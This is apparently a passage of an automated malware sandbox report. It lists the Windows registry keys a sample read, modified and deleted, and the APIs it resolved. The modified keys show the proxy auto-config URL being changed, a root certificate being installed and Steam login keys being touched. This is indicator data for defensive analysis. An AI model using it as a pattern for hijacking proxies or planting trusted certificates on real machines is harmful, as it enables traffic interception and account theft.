  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\DemolitionDerby2\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Diablo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MortalKombat3\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\MsGolf98\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NHLPowerPlay\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\NortonSystemInfo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ModeXOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\EmulationOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ShowFrameRate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\EnablePrintScreen
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ForceAGPSupport
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableAGPSupport
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableMMX
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableDDSCAPSInDDSD
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableWiderSurfaces
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\UseNonLocalVidMem
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ForceRefreshRate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\FlipNoVsync
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/png\Extension
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/gif\Extension
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\OWNDC
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\0\win32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\0\win32\(Default)
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1250
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1251
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1253
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1254
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1255
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1256
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1257
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1258
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\874
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1361
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFontSize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFontSizePrivate
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\864
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\708
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51256
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\720
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28596
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\775
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28594
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\852
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28592
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10029
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\54936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\52936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50227
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10008
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50950
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20000
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50229
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10082
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51251
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28595
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10007
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28603
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\29001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21027
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\863
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20106
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51253
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\737
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28597
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10006
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\869
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\862
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\38598
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28598
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20420
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20880
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21025
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20277
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1142
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20278
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1143
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20297
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1147
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20273
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1141
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20423
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\875
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20424
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20871
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1149
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\500
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1148
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20280
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1144
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50930
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50939
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50931
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20290
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50933
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20833
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\870
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50935
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20284
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1145
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20838
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50937
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20905
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1026
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20285
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1146
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\37
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1140
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1047
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20924
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\861
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10079
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57006
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57010
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57008
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57009
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57007
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57011
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20269
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50220
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50221
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50222
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50225
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28593
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28605
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\865
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20108
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\855
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\437
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\858
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\860
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10010
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20107
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20261
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10021
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\857
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28599
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10081
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10017
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1201
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\850
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20105
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28591
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10000
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Friendly http errors
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ\*
  • HKEY_CURRENT_USER\Software\Classes\.htm\Content Type
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\160A
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.css\Content Type
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.js\Content Type
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.jpg\Content Type
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.png\Content Type
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000
  • HKEY_CURRENT_USER\Software\Microsoft\FTP\Use Web Based FTP
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Services\SelectionActivityButtonDisable
修改的注册表键
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1609
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7B54741F1639CD6DE416D82CCF24FFAC934763BE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7B54741F1639CD6DE416D82CCF24FFAC934763BE\Blob
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication\ID
  • HKEY_CURRENT_USER\Software\Valve\Steam
  • HKEY_CURRENT_USER\Software\Valve\Steam\AutoLoginUser
  • HKEY_CURRENT_USER\Software\Valve\Steam\Language
删除的注册表键
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7B54741F1639CD6DE416D82CCF24FFAC934763BE
  • HKEY_CURRENT_USER\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\(Default)
  • HKEY_CURRENT_USER\Control Panel\Personalization\(Default)
API解析
  • kernel32.dll.FlsAlloc
  • kernel32.dll.FlsFree
  • kernel32.dll.FlsGetValue
  • kernel32.dll.FlsSetValue
  • kernel32.dll.InitializeCriticalSectionEx
  • kernel32.dll.CreateEventExW
  • kernel32.dll.CreateSemaphoreExW
  • kernel32.dll.SetThreadStackGuarantee
  • kernel32.dll.CreateThreadpoolTimer
  • kernel32.dll.SetThreadpoolTimer
  • kernel32.dll.WaitForThreadpoolTimerCallbacks
  • kernel32.dll.CloseThreadpoolTimer
  • kernel32.dll.CreateThreadpoolWait
  • kernel32.dll.SetThreadpoolWait
  • kernel32.dll.CloseThreadpoolWait
  • kernel32.dll.FlushProcessWriteBuffers
  • kernel32.dll.FreeLibraryWhenCallbackReturns
  • kernel32.dll.GetCurrentProcessorNumber
  • kernel32.dll.GetLogicalProcessorInformation
  • kernel32.dll.CreateSymbolicLinkW
  • kernel32.dll.EnumSystemLocalesEx
  • kernel32.dll.CompareStringEx
  • kernel32.dll.GetDateFormatEx
  • kernel32.dll.GetLocaleInfoEx
  • kernel32.dll.GetTimeFormatEx
  • kernel32.dll.GetUserDefaultLocaleName
  • kernel32.dll.IsValidLocaleName
  • kernel32.dll.LCMapStringEx
  • kernel32.dll.GetTickCount64
  • kernel32.dll.SortGetHandle
  • kernel32.dll.SortCloseHandle
  • dbghelp.dll.MakeSureDirectoryPathExists
  • dnsapi.dll.DnsApiFree
  • rasapi32.dll.RasConnectionNotificationW
  • sechost.dll.OpenServiceA
  • sechost.dll.NotifyServiceStatusChangeA
  • cryptbase.dll.SystemFunction036
  • ole32.dll.CoInitializeEx
  • advapi32.dll.RegDeleteTreeA
  • advapi32.dll.RegDeleteTreeW
  • jsproxy.dll.InternetGetProxyInfo
